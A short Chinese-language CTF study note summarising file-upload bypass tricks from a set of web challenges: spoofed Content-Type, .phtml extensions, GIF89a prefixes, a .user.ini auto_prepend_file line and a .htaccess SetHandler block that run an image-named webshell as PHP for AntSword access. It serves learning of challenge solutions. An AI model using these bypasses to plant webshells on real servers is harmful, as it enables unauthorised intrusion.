第1-63题总结:文件上传篇

  1. 一句话木马:
  2. Content-Type:image/png保持
  3. 后缀名绕过:phtml
  4. 添加图片前缀绕过内容检测:GIF89a?
  5. 利用.user.ini文件:GIF89a auto_prepend_file=pass.png,让可以访问的index.php加载一句话木马的图片格式,蚁剑连接index.php,eg:第二十三题
  6. .htaccess文件内容:将包含pass文件名的文件以php文件进行解析,蚁剑连接pass.png
<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>

你可能感兴趣的:(CTF-WEB,web)